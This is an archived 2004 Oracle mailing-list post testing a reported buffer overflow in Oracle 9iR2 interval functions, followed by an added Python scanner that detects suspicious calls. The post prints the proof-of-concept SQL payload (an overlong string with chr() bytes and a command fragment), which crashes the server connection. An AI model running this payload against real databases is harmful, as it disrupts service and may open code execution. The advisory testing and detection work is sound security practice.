Oracle Database 9ir2 Interval Conversion Buffer Overflow
2004-02-26 - By Pete Finnigan
Hi Jared,
I heard about this issue in early Feb. This guy Cesar Cerrudo posted a
message to vulnwatch about these two vulnerabilities and also said he
had a lot more. I saw a post on Bugtraq yesterday where someone was
asking for the patch info. It is not clear if an Oracle fix matches this
bug or not and which patch applies. There is no advisory.
Here is the header info from vulnwatch from his post. I have the full
email sent to vulnwatch which is similar to Jared's version on
securiteam but is longer (no extra technical details, mostly rants).
<quote>
From: Cesar [mailto:cesarc56@(protected)]
Sent: Thu 2004-02-05 3:15 PM
To: vulnwatch@(protected)
Cc:
Subject: [VulnWatch] Oracle Database 9ir2 Interval Conversion
Functions Buffer Overflow
Security Advisory
Name: Oracle Database 9ir2 Interval Conversion
Functions Buffer Overflow.
System Affected : Oracle Database 9ir2, previous
versions could be affected too.
Severity : High
Remote exploitable : Yes
Author: Cesar Cerrudo.
Date: 02/05/04
Advisory Number: CC020401
</quote>
Anyway I have run the following test based on what he said in his
advisory:
SQL> edit
Wrote file afiedt.buf
  1  SELECT NUMTOYMINTERVAL(1, 'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'
  2  || chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)|
  3  ||chr(52)||chr(35)||chr(148)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)|
  4* ARE YOU SURE? >c:\Unbreakable.txt') FROM DUAL
SQL> /
ARE YOU SURE? >c:\Unbreakable.txt') FROM DUAL
*
ERROR at line 4:
ORA-03113: end-of-file on communication channel
SQL> select sysdate from dual;
select sysdate from dual
*
ERROR at line 1:
ORA-03114: not connected to ORACLE
SQL>
SQL> connect system/manager@(protected)
Connected.
SQL> edit
Wrote file afiedt.buf
  1  SELECT NUMTODSINTERVAL(1, 'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'
  2  || chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)|
  3  ||chr(52)||chr(35)||chr(148)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)|
  4* ARE YOU SURE? >c:\Unbreakable.txt') FROM DUAL
SQL> /
SELECT NUMTODSINTERVAL(1, 'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'
*
ERROR at line 1:
ORA-03113: end-of-file on communication channel
SQL> select sysdate from dual;
select sysdate from dual
*
ERROR at line 1:
ORA-03114: not connected to ORACLE
SQL>
So yes, both of these vulnerabilities will terminate the Oracle
connection, so it's possible it could be exploited remotely. The file
c:\Unbreakable.txt is not created though. I have not tried under a
debugger to see if anything can be done with the 3113 error in terms of
exploiting the stack. If this is a true buffer overflow exploit then he
would need to pass some sort of shell code and manipulate the stack to
run it. Maybe his chr(??) are some sort of shell code for it to be a
buffer overflow and capture the machine. On the surface it doesn't seem
to work though.
SQL*Net trace didn't tell me much, and also an Oracle core is created in
the cdump directory with the "are you sure" text on the top of the stack.
I ran this on XP 9ir2 Personal Edition.
Kind regards
Pete
--
Pete Finnigan
email:pete@(protected)
Web site: http://www.petefinnigan.com - Oracle security audit specialists
Book:Oracle security step-by-step Guide - see http://store.sans.org for details.
-- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ------
Please see the official ORACLE-L FAQ: http://www.orafaq.com
-- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ------
To unsubscribe send email to: oracle-l-request@(protected)
put 'unsubscribe' in the subject line.
--
Archives are at http://www.freelists.org/archives/oracle-l/
FAQ is at http://www.freelists.org/help/fom-serve/cache/1.html
-- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- --
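An added detection example, not part of Pete's message or of Cesar Cerrudo's advisory: a Python scan over SQL statement text (for instance statements pulled from an audit trail or SQL*Net trace) that flags NUMTOYMINTERVAL/NUMTODSINTERVAL calls whose unit argument is built by concatenation rather than a plain literal, is longer than any valid unit keyword, or is not one of the documented keywords. The sample statements are constructed; the valid unit sets (YEAR/MONTH and DAY/HOUR/MINUTE/SECOND) are Oracle's documented values, and max_unit_len is an assumed threshold.

```python
import re

# Matches the start of a call to either interval conversion function; the match
# ends on the opening parenthesis so the argument scanner can start there.
FUNC_RE = re.compile(r"\b(NUMTOYMINTERVAL|NUMTODSINTERVAL)\s*\(", re.IGNORECASE)
# A unit argument as Oracle documents it: one plain single-quoted literal.
LITERAL_RE = re.compile(r"^'([^']*)'$")
# Documented unit keywords for each function.
VALID_UNITS = {
    "NUMTOYMINTERVAL": {"YEAR", "MONTH"},
    "NUMTODSINTERVAL": {"DAY", "HOUR", "MINUTE", "SECOND"},
}

# Constructed sample statements standing in for audit-trail entries.
SAMPLE_STATEMENTS = [
    "SELECT NUMTOYMINTERVAL(1, 'MONTH') FROM DUAL",
    "SELECT NUMTODSINTERVAL(30, 'minute') FROM dual",
    "SELECT NUMTOYMINTERVAL(1, 'AAAAAAAAAA' || chr(59) || chr(79)) FROM DUAL",
    "SELECT NUMTODSINTERVAL(1, 'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR') FROM DUAL",
]


def _call_args(sql, open_paren):
    """Split the call whose '(' is at open_paren into top-level arguments.

    Tracks parenthesis depth and single-quoted strings so nested calls such as
    chr(59) and commas inside literals do not split an argument. Returns None
    if the closing parenthesis is never reached.
    """
    depth, in_str, args, buf = 0, False, [], []
    for ch in sql[open_paren:]:
        if ch == "'":
            in_str = not in_str
        if not in_str:
            if ch == "(":
                depth += 1
                if depth == 1:
                    continue  # do not keep the call's own opening parenthesis
            elif ch == ")":
                depth -= 1
                if depth == 0:
                    args.append("".join(buf).strip())
                    return args
            elif ch == "," and depth == 1:
                args.append("".join(buf).strip())
                buf = []
                continue
        buf.append(ch)
    return None


def suspicious_interval_calls(sql, max_unit_len=10):
    """Return (function, reason) findings for every questionable call in sql."""
    findings = []
    for m in FUNC_RE.finditer(sql):
        func = m.group(1).upper()
        args = _call_args(sql, m.end() - 1)
        if args is None or len(args) < 2:
            findings.append((func, "malformed call"))
            continue
        lit = LITERAL_RE.match(args[1])
        if lit is None:
            findings.append((func, "non-literal unit argument: " + args[1][:40]))
        elif len(lit.group(1)) > max_unit_len:
            findings.append((func, "oversized unit literal (%d chars)" % len(lit.group(1))))
        elif lit.group(1).strip().upper() not in VALID_UNITS[func]:
            findings.append((func, "unexpected unit " + lit.group(1)))
    return findings


if __name__ == "__main__":
    for stmt in SAMPLE_STATEMENTS:
        for func, reason in suspicious_interval_calls(stmt):
            print("%s: %s  <- %s" % (func, reason, stmt))
```

A legitimate application only ever passes one of the six keywords, so any hit from this scan is worth correlating with ORA-03113 entries in the alert log and fresh files in the cdump directory.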